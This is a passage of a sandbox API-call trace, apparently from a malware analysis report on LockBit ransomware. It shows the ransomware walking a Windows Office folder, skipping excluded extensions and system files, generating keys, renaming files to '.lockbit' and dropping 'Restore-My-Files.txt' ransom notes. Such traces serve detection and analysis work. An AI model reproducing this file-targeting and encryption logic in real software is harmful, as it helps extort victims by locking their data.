Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.441] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x948b900, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbc9ea880, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x948b900, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xbf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14829_.GIF", cAlternateFileName="")) returned 1 [0203.441] lstrcmpiW (lpString1=".", lpString2="BD14829_.GIF") returned -1 [0203.442] lstrcmpiW (lpString1="..", lpString2="BD14829_.GIF") returned -1 [0203.442] PathFindExtensionW (pszPath="BD14829_.GIF") returned=".GIF" [0203.442] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.442] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.442] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.442] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.442] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.442] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.442] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.442] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.442] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.442] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.442] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.442] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.442] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.443] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.443] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.443] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14829_.GIF") returned 1 [0203.443] lstrcmpiW (lpString1="ntldr", lpString2="BD14829_.GIF") returned 1 [0203.443] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14829_.GIF") returned 1 [0203.443] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14829_.GIF") returned 1 [0203.443] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14829_.GIF") returned -1 [0203.443] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14829_.GIF") returned 1 [0203.443] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14829_.GIF") returned 1 [0203.443] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.443] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14829_.GIF") returned=".GIF" [0203.443] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.443] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.443] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.443] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.444] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.444] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.444] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.444] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.444] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.444] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.444] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.444] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.444] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.444] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.444] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.444] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.444] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.444] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.444] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.444] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.444] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.444] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.444] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.444] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.444] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.444] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.444] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.444] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14829_.GIF.lockbit") returned 78 [0203.444] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14829_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14829_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.445] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.446] malloc (_Size=0x40068) returned 0x3df0008 [0203.446] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=191) returned 1 [0203.446] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.446] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.446] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.447] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.450] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14829_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14829_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.450] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.450] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.450] free (_Block=0x1fa2ed8) [0203.450] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14829_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.450] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.450] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.450] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa79e600, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbc9ea880, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa79e600, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14830_.GIF", cAlternateFileName="")) returned 1 [0203.450] lstrcmpiW (lpString1=".", lpString2="BD14830_.GIF") returned -1 [0203.450] lstrcmpiW (lpString1="..", lpString2="BD14830_.GIF") returned -1 [0203.450] PathFindExtensionW (pszPath="BD14830_.GIF") returned=".GIF" [0203.450] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.450] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.450] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.450] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.450] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.450] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.450] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.450] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.450] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.450] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.450] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.450] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.450] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.450] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.451] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.451] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.451] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.451] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.451] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.451] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.451] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14830_.GIF") returned 1 [0203.451] lstrcmpiW (lpString1="ntldr", lpString2="BD14830_.GIF") returned 1 [0203.451] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14830_.GIF") returned 1 [0203.452] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14830_.GIF") returned 1 [0203.452] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14830_.GIF") returned -1 [0203.452] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14830_.GIF") returned 1 [0203.452] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14830_.GIF") returned 1 [0203.452] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.452] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14830_.GIF") returned=".GIF" [0203.452] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.452] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.452] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.452] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.452] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.452] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.452] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.452] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.452] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.452] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.452] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.452] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.452] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.452] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.452] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.452] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14830_.GIF.lockbit") returned 78 [0203.453] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14830_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14830_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.454] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.454] malloc (_Size=0x40068) returned 0x3df0008 [0203.454] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=184) returned 1 [0203.454] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.454] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.454] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.455] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.457] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14830_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14830_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.457] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.457] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.457] free (_Block=0x1fa2ed8) [0203.457] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14830_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.457] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.457] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.458] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa79e600, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbc9ea880, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa79e600, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14831_.GIF", cAlternateFileName="")) returned 1 [0203.458] lstrcmpiW (lpString1=".", lpString2="BD14831_.GIF") returned -1 [0203.458] lstrcmpiW (lpString1="..", lpString2="BD14831_.GIF") returned -1 [0203.458] PathFindExtensionW (pszPath="BD14831_.GIF") returned=".GIF" [0203.458] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.458] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.458] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.458] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.458] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.458] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.458] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.458] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.458] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.458] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.458] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.458] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.458] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.458] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.458] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.459] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14831_.GIF") returned 1 [0203.459] lstrcmpiW (lpString1="ntldr", lpString2="BD14831_.GIF") returned 1 [0203.459] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14831_.GIF") returned 1 [0203.459] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14831_.GIF") returned 1 [0203.459] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14831_.GIF") returned -1 [0203.459] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14831_.GIF") returned 1 [0203.459] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14831_.GIF") returned 1 [0203.459] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.459] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14831_.GIF") returned=".GIF" [0203.459] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.459] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.459] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.459] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.459] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.459] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.459] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.459] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.459] lstrcmpiW 